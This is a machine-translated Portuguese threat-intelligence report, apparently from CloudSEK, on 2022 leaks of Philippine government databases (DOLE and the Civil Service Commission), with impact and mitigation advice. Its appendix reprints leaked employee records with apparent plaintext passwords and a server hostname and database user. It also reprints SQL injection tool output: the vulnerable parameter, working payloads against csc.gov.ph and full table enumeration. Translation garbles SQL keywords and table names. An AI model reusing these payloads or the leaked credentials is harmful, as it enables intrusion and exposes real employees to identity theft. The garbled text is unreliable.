Os agentes de ameaças atacaram o governo das Filipinas em maio de 2022 em ataques cibernéticos, e dados confidenciais do governo foram expostos. CloudSEKda plataforma contextual de risco digital de IA XV Vigília descobriu uma postagem em um fórum de crimes cibernéticos, anunciando dados comprometidos contendo informações confidenciais dos seguintes bancos de dados:

• Governo
• Comissão da Função Pública

Análise e atribuição

Informações do Post

Violação de dados do governo

• Em 9 de maio de 2022, um agente de ameaças publicou o banco de dados do governo das Filipinas para o domínio https://dole [.] gov [.] ph.

 

• O banco de dados comprometido contém os seguintes detalhes.

Detalhes compartilhadosE-mail: combinações de senhas Funcionários/Gerentes, Cargos, IDs de funcionários, comentários, dados do departamento, locais de dob/rescisão, taxas e tipos de pagamento

Violação de dados da Comissão da Função Pública

1. Por Database Breach

• Em 15 de maio de 2022, um agente de ameaças publicou o banco de dados da Comissão do Serviço Civil das Filipinas para o domínio http://csc[.]gov[.]ph.

 

• O agente da ameaça abandonou o site para que os usuários compartilhassem, baixassem e usassem.
• A Comissão do Serviço Civil (CSC) é a Agência Central de Pessoal do Governo das Filipinas, responsável pelas políticas, planos e programas relativos a todos os funcionários do serviço público.
• Os dados comprometidos do total de 19121 registros incluem os seguintes detalhes.

Detalhes compartilhadosID do empregador, ID da cidade, ID do departamento, ID da agência, ID da agência, token, status, administrador, senha, nome de usuário, data de criação e muitos outros campos

• O ator também compartilhou informações sobre o sistema, incluindo detalhes de back-end, DBMS, usuário do DBMS e nome do host.
• Além das informações do funcionário, outros arquivos, como os seguintes, foram compartilhados.

Outros arquivos compartilhados

• Registros de inventário

• Registros do usuário

• Banco de dados de usuários

• Contas de agências

• Logins do MySQL

• despejo do phpMyAdmin

• Logins do XAMPP

• Os registros de bate-papo dos funcionários também foram comprometidos e publicados.

• O ator também mencionou que o site está usando senhas de texto simples.
• Um agente de ameaças mencionou que os dados violados podem ser decorrentes da violação ocorrida em 2021.
• No entanto, o agente da ameaça editorial respondeu que a violação de 2021 consistia em informações confidenciais do usuário sem logins e que o banco de dados não foi fornecido.

Por SQL Injection

• Em 15 de maio de 2022, outro ator de ameaças no fórum de crimes cibernéticos compartilhou uma postagem semelhante, com a maioria dos dados provavelmente iguais.
• No entanto, a violação de dados foi realizada pelo SQL Injection em https://csc [.] gov [.] ph, violando cerca de um milhão de linhas de informações de funcionários.
• Outro agente de ameaças mencionou que havia senhas de texto simples sem hash.

 

Impacto e mitigação

ImpactoMitigação

• Essas informações confidenciais podem ser um risco em grande escala, levando à exposição da infraestrutura governamental crítica.
• Isso forneceria aos agentes mal-intencionados os detalhes necessários para lançar ataques sofisticados de ransomware, extrair dados e manter a persistência.
• Se os dados vazados não forem criptografados, isso poderá permitir a aquisição de contas.
• Senhas comumente usadas ou senhas fracas podem levar a ataques de força bruta.
• As PII (Informações de Identificação Pessoal) dos funcionários pertencentes ao governo podem ser usadas para conduzir:
  • Ataques de engenharia social
  • Ataques de phishing
  • Roubo de identidade

• Escaneie repositórios para identificar credenciais e segredos expostos.
• Monitore fóruns de crimes cibernéticos para ver as táticas mais recentes empregadas pelos agentes de ameaças.
• Redefina as credenciais de login do usuário comprometidas e implemente uma política de senha forte para todas as contas de usuário.
• Corrija endpoints vulneráveis e exploráveis.
• Monitore anomalias nas contas dos usuários, o que pode indicar possíveis aquisições de contas.
• Audite e monitore todos os registros de eventos e incidentes para identificar padrões e comportamentos incomuns.

Apêndice

2888.1688,2198.32,2991, HRMO, 0F87F298,1,1, Zos! J|*Z8t #T] wT, [email protected] ,2015-11-07 06:38:29,201 9-06-26 09:49:03, Escritório Central, INSTITUTO ESTADUAL DE CIÊNCIA E TECNOLOGIA DA ABRA, [email protected]

155,133,3293,28,4277, HRMo,9E729EDA,1,1, Zo2Cu $ #T1PYNMv, [email protected] ,2016-01-08 15:15:13,202 0-07-28 14:11:40, Distrito Aquático, DISTRITO AQUÁTICO DE ABULUG (CAGAYAN), [email protected]

2177,995,3019,39,3523, HRMO, b9d8057e,1,1,6! G%FI^, [email protected] ,2015-10-28 08:13:06,202 0-05-04 11:04:38, SUC, FACULDADE ESTADUAL DE AGRICULTURA E TECNOLOGIA AGUSAN DEL SUR, [email protected]

<blank>514.754.2940,37,4379, HRMO, da4541c6,1,1,”;,} -CNm; :^*W2″, [email protected] ,2016-01-15 12:21:10,202 0-07-09 06:42:36,, DISTRITO AQUÁTICO DE AJUY, [email protected]

515.701.2245,37,2545, HRMO, EE4CD846,1,1,3kbZUdn] 56RSj #p, [email protected] ,2015-11-05 10:59:42,202 0-03-13 18:32:14, Faculdade e Universidade Estadual, AKLAN STATE UNIVERSITY, root

1647,1411,2720,30,2937, HRMO, f0e0b728,1,1, :6/WJD) C*EHPMX<, [email protected] ,2015-11-06 16:16:56,202 0-06-25 11:52:48, Escritório Executivo, BANCO DE INVESTIMENTO ISLÂMICO AL-AMANAH DAS FILIPINAS, [email protected]

153.418.2474,34.628, HRMo,6a5f9bad,1,1, Z7rejgdnjw|_; Lx, [email protected] ,2015-10-27 09:23:52,202 0-07-09 06:31:47, Distrito da Água, DISTRITO AQUÁTICO DE ALAMINOS (LAGUNA), [email protected]

Informações do sistema:

Citação:

Sistema de back-end: Windows 10

DBMS: MySQL 5.5

Nome do host: WIN-NEJB836KBNF

Usuário DBMS: 'jmonses @localhost '

Informações fornecidas:

Citação:

Registros de inventário

Registros do usuário

Banco de dados de usuários

Contas de agências

Logins do MySQL

despejo do phpMyAdmin

Logins do XAMPP

Registros de bate-papo do FreiChat

Despejo de funcionários (inclui nome completo, endereços, nomes de usuário, e-mails pessoais, e-mails de agências e funcionários do governo)

E mais

Estrutura do arquivo:

Citação:

.

|— cdcol

| `— cds.csv

|— csc_cris

| |— tblref_subcat.csv

| |— tblref_subcat_topic.csv

| |— tblref_topic.csv

| |— tblresource_master.csv

| |— tblusers.csv

| |— vw_resource_master.csv

| |— vw_subcat_category.csv

| `— vw_subcat_topics.csv

|— csc_guestchat

| |— frei_banned_users.csv

| |— frei_chat.csv

| |— frei_config.csv

| |— frei_groupchat.csv

| |— frei_rooms.csv

| |— frei_session.csv

| |— frei_smileys.csv

| |— frei_video_session.csv

| |— frei_video_session.csv.1

| |— frei_webrtc.csv

| `— frei_webrtc.csv.1

|— csc_ighrsdb

| |— ref_2020inventorysummary.csv

| |— ref_2021inventorysummary_asof_aug16.csv

| |— tbl_agencyaccounts.csv

| |— tbl_agencyinventory_logs.csv

| |— tbl_personnel2.csv

| |— tbl_plantilla_jocos.csv

| |— tbl_userlogs.csv

| |— vw_agencyinventory_logs.csv

| |— vw_cscfoaccounts.csv

| `— vw_plantilla_sec_uploading_count.csv

|— csc_ighrsdb_31 de agosto de 2020

|— mysql

| `— user.csv

|— esquema de desempenho

| `— accounts.csv

|— phpmyadmin

| |— pma_bookmark.csv

| |— pma_column_info.csv

| |— pma_designer_coords.csv

| |— pma_history.csv

| |— pma_pdf_pages.csv

| |— pma_recent.csv

| |— pma_relation.csv

| |— pma_table_coords.csv

| |— pma_table_info.csv

| |— pma_table_uiprefs.csv

| |— pma_tracking.csv

| |— pma_userconfig.csv

| `— pma_userconfig.csv.1

`— webauth

`— user_pwd.csv

9 diretórios, 46 arquivos

Amostra de dados por injeção de SQL

Os bancos de dados contêm

— informações de cada funcionário do governo da PH (tbl_personnel, tbl_personnel2) (nome, sobrenome, sexo, TIN, SSS, agência, cidadania, salário, número de telefone, e-mail, chave de acesso v3, etc.)

— logins de contas de agências para o painel IGHRS, pode gerenciar todos os dados dessa agência

— registros de bate-papo de funcionários

muito mais que você pode ver abaixo

sistema operacional do servidor web: Windows

tecnologia de aplicativos web: PHP 5.5.9, Apache 2.4.7

DBMS de back-end: MySQL >= 5.5

—

Parâmetro: aid (GET)

Tipo: cego baseado em booleano

Título: AND boolean based blind — cláusula WHERE ou HAVING

Carga útil: aid=3094 AND 4076=4076

Tipo: baseado em erros

Título: MySQL >= 5.5 E baseado em erros — cláusula WHERE, HAVING, ORDER BY ou GROUP BY (BIGINT UNSIGNED)

Carga útil: aid=3094 E (SELECIONE 2* (IF ((SELECT * FROM (SELECT CONCAT (0x71786a7871, (SELECT (ELT (5016=5016,1))) ,0x7162627671,0x78)) s), 8446744073709551610, 84467440737073709551610)))

Tipo: consultas empilhadas

Título: MySQL >= 5.0.12 consultas empilhadas (comentário)

Carga útil: aid=3094; SELECIONE SLEEP (5) #

Tipo: persiana baseada no tempo

Título: MySQL >= 5.0.12 E cego baseado em tempo (consulta SLEEP)

Carga útil: aid=3094 AND (SELECIONE 1742 DE (SELECT (SLEEP (5))) SNyJ)

Tipo: consulta UNION

Título: Consulta UNION genérica (NULL) — 1 coluna

Carga útil: aid=-3023 UNION ALL SELECT CONCAT (0x71786a7871,0x5558597156435a75594377414f4c7151614d4655626d675a7a4d6f766f6466414364415972426757,0x7162627671) — —

—

Banco de dados: information_schema

+—————————————————+

| CONJUNTOS DE CARACTERES |

| AGRUPAMENTOS |

| COLLATION_CHARACTER_SET_APPLICABILITY |

| COLUNAS |

| PRIVILÉGIOS DE COLUNA |

| MOTORES |

| EVENTOS |

| ARQUIVOS |

| STATUS_GLOBAL |

| VARIÁVEIS_GLOBAIS |

| INNODB_BUFFER_PAGE |

| INNODB_BUFFER_PAGE_LRU |

| INNODB_BUFFER_POOL_STATS |

| INNODB_CMP |

| INNODB_CMPMEM |

| INNODB_CMPMEM_RESET |

| INNODB_CMP_PER_INDEX |

| INNODB_CMP_PER_INDEX_RESET |

| INNODB_CMP_RESET |

| INNODB_FT_BEING_EXCLUÍDO |

| INNODB_FT_CONFIG |

| INNODB_FT_DEFAULT_STOPWORD |

| INNODB_FT_EXCLUÍDO |

| INNODB_FT_INDEX_CACHE |

| INNODB_FT_INDEX_TABLE |

| INNODB_LOCKS |

| INNODB_LOCK_WAITS |

| INNODB_METRICS |

| INNODB_SYS_COLUMNS |

| INNODB_SYS_DATAFILES |

| INNODB_SYS_FIELDS |

| INNODB_SYS_FOREIGN |

| INNODB_SYS_FOREIGN_COLS |

| INNODB_SYS_INDEXES |

| INNODB_SYS_TABLES |

| INNODB_SYS_TABLESPACES |

| INNODB_SYS_TABLESTATS |

| INNODB_TRX |

| UTILIZAÇÃO_COLUNA_CHAVE |

| OTIMIZER_TRACE |

| PARÂMETROS |

| PARTIÇÕES |

| PLUG-INS |

| LISTA DE PROCESSOS |

| CRIAÇÃO DE PERFIL |

| RESTRIÇÕES_REFERENCIAIS |

| ROTINAS |

| ESQUEMAS |

| SCHEMA_PRIVILEGES |

| STATUS DA SESSÃO |

| VARIÁVEIS_DE_SESSÃO |

| ESTATÍSTICAS |

| MESAS |

| ESPAÇOS DE MESA |

| RESTRIÇÕES DE TABELA |

| PRIVILÉGIOS DE TABELA |

| GATILHOS |

| PRIVILÉGIOS DE USUÁRIO |

| VISUALIZAÇÕES |

+—————————————————+

Banco de dados: cdcol

+—————————————————+

| CDs |

+—————————————————+

Banco de dados: csc_cdris

+—————————————————+

| bate-papo |

| tablchat |

| membro da tabela |

| escritório |

| tblref_author |

| tblref_category |

| tblref_subcat |

| tblref_subcat_topic |

| tblref_topic |

| tblref_type |

| tblresource_master |

| usuários de tabuleiro |

| vw_resource_master |

| vw_subcat_category |

| vw_subcat_topics |

| vw_type_category |

| vw_user_accomplishment |

| vw_user_accomplishment_withtype |

+—————————————————+

Banco de dados: csc_guestchat

+—————————————————+

| frei_banned_users |

| chat grátis |

| frei_config |

| chat de grupo grátis |

| quartos gratuitos |

| sessão_gratuita |

| frei_smileys |

| sessão_de_video_gratuita |

| free_web.br |

+—————————————————+

Banco de dados: performance_schema

+—————————————————+

| contas |

| cond_instances |

| events_stages_current |

| events_stages_history |

| events_stages_history_long |

| events_stages_summary_by_account_by_event_name |

| events_stages_summary_by_host_by_event_name |

| events_stages_summary_by_thread_by_event_name |

| events_stages_summary_by_user_by_event_name |

| events_stages_summary_global_by_event_name |

| events_statements_current |

| events_statements_history |

| events_statements_history_long |

| events_statements_summary_by_account_by_event_name |

| events_statements_summary_by_digest |

| events_statements_summary_by_host_by_event_name |

| events_statements_summary_by_thread_by_event_name |

| events_statements_summary_by_user_by_event_name |

| events_statements_summary_global_by_event_name |

| events_waits_current |

| events_waits_history |

| events_waits_history_long |

| events_waits_summary_by_account_by_event_name |

| events_waits_summary_by_host_by_event_name |

| events_waits_summary_by_instance |

| events_waits_summary_by_thread_by_event_name |

| events_waits_summary_by_user_by_event_name |

| events_waits_summary_global_by_event_name |

| instâncias de arquivo |

Banco de dados: phpmyadmin

+—————————————————+

| pma_bookmark |

| pma_column_info |

| pma_designer_coords |

| história_pma |

| pma_pdf_pages |

| pma_recent |

| relação_pma |

| pma_table_coords |

| pma_table_info |

| pma_table_uiprefs |

| rastreamento de pma |

| pma_userconfig |

+—————————————————+

Banco de dados: webauth

+—————————————————+

| user_pwd |

+—————————————————+

Banco de dados: csc_ighrsdb

+—————————————————+

| nomes femininos |

| cópia_de_nome_mulher |

| frei_banned_users |

| chat grátis |

| frei_config |

| chat de grupo grátis |

| quartos gratuitos |

| sessão_gratuita |

| frei_smileys |

| sessão_de_video_gratuita |

| free_web.br |

| nomes_masculinos |

| resumo do painel ref_2020 |

| resumo do inventário ref_2020 |

| resumo do painel ref_2021 |

| resumo do inventário ref_2021 |

| ref_2021inventorysummary_asof_aug16 |

| resumo do inventário ref_2021_byage_mar2021 |

| ref_2021plantilapersonnel_a partir de 31 de agosto de 2021 |

| tbl_agency_offices |

| tbl_agencyaccounts |

| tbl_agencyhrmo |

| tbl_agencyinventory |

| tbl_agencyinventory_archive |

| tbl_agencyinventory_logs |

| tbl_agencyinventory_plantilla |

| tbl_agencyinventory_plantilla_archive |

| tbl_agencyinventory_plantilla_byage |

| tbl_agencyinventory_tmp |

| tbl_branch_office |

| tbl_cscofficelookup |

| tbl_dashboardsummary |

| tbl_dashboardsummary_archive |

| tbl_dashboardsummary_plantilla |

| tbl_dashboardsummary_plantilla_archive |

| tbl_job_grade |

| tbl_personal |

| tbl_personnel2 |

| tbl_personnel_uplink_errors |

| tbl_plantilla |

| tbl_plantilla_jocos |

| tbl_plantilla_jocos_copy |

| tbl_plantilla_jocos_hist |

| tbl_plantilla_logs |

| tbl_plantilla_mod_login |

| tbl_plantilla_ncareer |

| tbl_plantilla_ncareer_hist |

| tbl_plantilla_uplink_errors |

| tbl_plmonitoring_dump |

| tbl_pm_acessado |

| tbl_pos_annotations |

| tabl_position |

| tbl_resourcefile |

| tbl_salary_grade |

| tbl_salary_grade_2016 |

| tbl_salary_grade_2017 |

| tbl_salary_grade_2018 |

| tbl_salary_grade_2019 |

| tbl_salary_grade_2020 |

| tbl_seqref |

| tbl_servicecounter |

| tbl_settings |

| tbl_upload_interrupt |

| tbl_upload de arquivo |

| tbl_userlogs |

| tbl_version_update |

| tblref_agencyaddress |

| tblref_eligibility |

| usuários de tabuleiro |

| vw_agencyaccounts |

| vw_agencyhrmo_accts |

| vw_agencyinventory |

| vw_agencyinventory_archive |

| vw_agencyinventory_dtl_rpt |

| vw_agencyinventory_gender |

| vw_agencyinventory_logs |

| vw_agencyinventory_plantilla_dtl_rpt |

| vw_agencyinventory_plantilla_dtl_rpt_age |

| vw_agencyinventory_rpt |

| vw_agencyinventory_summary |

| vw_agencyinventory_summary2 |

| vw_agencyinventory_summary3_plantilla |

| vw_agencyinventory_summary4_plantilla |

| vw_cscfoaccounts |

| vw_cscroaccounts |

| vw_personnel_manager |

| vw_plantilla_noncareer |

| vw_plantilla_of_personnel |

| vw_plantilla_personal |

| vw_plantilla_query |

| vw_plantilla_sec_uploading_count |

| vw_userlog_monthly |

| vw_userlogs |

+—————————————————+

Banco de dados: mysql

+—————————————————+

| usuário |

| columns_priv |

| banco de dados |

| evento |

| função |

| registro geral |

| categoria_de_ajuda |

| palavra-chave de ajuda |

| relação_de_ajuda |

| tópico_de_ajuda |

| innodb_index_stats |

| innodb_table_stats |

| ndb_binlog_index |

| plug-in |

| processo |

| procs_priv |

| proxies_priv |

| servidores |

| slave_master_info |

| slave_relay_log_info |

| slave_worker_info |

| log lento |

| tables_priv |

| fuso horário |

| fuso horário_bissexto |

| nome_do_fuso horário |

| transição_fuso horário |

| tipo_do_transição_fuso horário |

+—————————————————+

| file_summary_by_event_name |

| arquivo_sumário_por_instância |

| host_cache |

| anfitriões |

| mutex_instances |

| objetos_summary_global_by_type |

| temporizadores de desempenho |

| relock_instances |

| session_account_connect_attrs |

| session_connect_attrs |

| configuração_atores |

| configuração_consumidores |

| instrumentos_de_configuração |

| objetos de configuração |

| temporizadores de configuração |

| instâncias de soquete |

| socket_summary_by_event_name |

| socket_summary_by_instance |

| table_io_waits_summary_by_index_usage |

| table_io_waits_summary_by_table |

| table_lock_waits_summary_by_table |

| tópicos |

| usuários |

+—————————————————+

Banco de dados: csc_ighrsdb_aug312020

+—————————————————+

| nomes femininos |

| cópia_de_nome_mulher |

| frei_banned_users |

| chat grátis |

| frei_config |

| chat de grupo grátis |

| quartos gratuitos |

| sessão_gratuita |

| frei_smileys |

| sessão_de_video_gratuita |

| free_web.br |

| nomes_masculinos |

| rpt_dashboardsummary_asof08312020 |

| rpt_dashboardsummary_a partir de 10 de julho |

| rpt_dashboardsummary_a partir de 13 de julho |

| rpt_inventorysummary_a partir de 31/08/2020 |

| rpt_inventorysummary_a partir de 10 de julho |

| rpt_inventorysummary_a partir de 13 de julho |

| tbl_agency_offices |

| tbl_agencyaccounts |

| tbl_agencyhrmo |

| tbl_agencyinventory |

| tbl_agencyinventory_archive |

| tbl_agencyinventory_logs |

| tbl_agencyinventory_plantilla |

| tbl_agencyinventory_plantilla_archive |

| tbl_agencyinventory_plantilla_withage |

| tbl_agencyinventory_tmp |

| tbl_branch_office |

| tbl_cscofficelookup |

| tbl_dashboardsummary |

| tbl_dashboardsummary_archive |

| tbl_dashboardsummary_plantilla |

| tbl_dashboardsummary_plantilla_archive |

| tbl_job_grade |

| tbl_personal |

| tbl_personnel2 |

| tbl_personnel_uplink_errors |

| tbl_plantilla |

| tbl_plantilla_jocos |

| tbl_plantilla_jocos_copy |

| tbl_plantilla_jocos_hist |

| tbl_plantilla_logs |

| tbl_plantilla_mod_login |

| tbl_plantilla_ncareer |

| tbl_plantilla_ncareer_hist |

| tbl_plantilla_uplink_errors |

| tbl_plmonitoring_dump |

| tbl_pm_acessado |

| tbl_pos_annotations |

| tabl_position |

| tbl_resourcefile |

| tbl_salary_grade |

| tbl_salary_grade_2016 |

| tbl_salary_grade_2017 |

| tbl_salary_grade_2018 |

| tbl_salary_grade_2019 |

| tbl_salary_grade_2020 |

| tbl_seqref |

| tbl_servicecounter |

| tbl_settings |

| tbl_upload_interrupt |

| tbl_upload de arquivo |

| tbl_userlogs |

| tbl_version_update |

| tblref_agencyaddress |

| tblref_eligibility |

| usuários de tabuleiro |

| vw_agencyaccounts |

| vw_agencyhrmo_accts |

| vw_agencyinventory |

| vw_agencyinventory_archive |

| vw_agencyinventory_dtl_rpt |

| vw_agencyinventory_gender |

| vw_agencyinventory_logs |

| vw_agencyinventory_plantilla_dtl_rpt |

| vw_agencyinventory_rpt |

| vw_agencyinventory_summary |

| vw_agencyinventory_summary2 |

| vw_agencyinventory_summary3_plantilla |

| vw_cscfoaccounts |

| vw_cscroaccounts |

| vw_plantilla_noncareer |

| vw_plantilla_of_personnel |

| vw_plantilla_personal |

| vw_plantilla_query |

| vw_plantilla_sec_uploading_count |

| vw_userlog_monthly |

| vw_userlogs |

+—————————————————+

Banco de dados: csc_lookupdb

+—————————————————+

| vw\ x1f_agencymaster2 |

| referência_agência |

| área_referência |

| área_tipo_referência |

| referência_distrito |

| referência_de_elegibilidade |

| nível_referência |

| referência_municipalidade |

| pos_status_reference |

| posição_referência |

| posição_referência_cópia |

| position_reference_nongovt |

| província_referência |

| referência_noda_nota salarial |

| referência de status |

| tbl_citylookup |

| tbl_cscofficelookup |

| tbl_eligibilitytype |

| tbl_examcenterlookup |

| tbl_código postal |

| tbldibar_reflookup |

| tblref_agencydept |

| tblref_agencydept_nongovt |

| tblref_agencyhrmo |

| tblref_agencyro |

| tblref_agencysector |

| tblref_agencytype |

| tblref_bloodtype |

| tblref_cidadania |

| tblref_civilstatus |

| tblref_deptagency_tmp |

| tblref_educcourses |

| tblref_educlevel |

| tblref_educschool |

| tblref_empstatus |

| tblref_regions |

| tblref_religion |

| tblref_trainingprovider |

| tblref_trainingtitle |

| vw_agencyhrmo |

| vw_agencylookup |

| vw_agencymaster |

| vw_agencyromaster |

| vw_agencysector_type |

+—————————————————+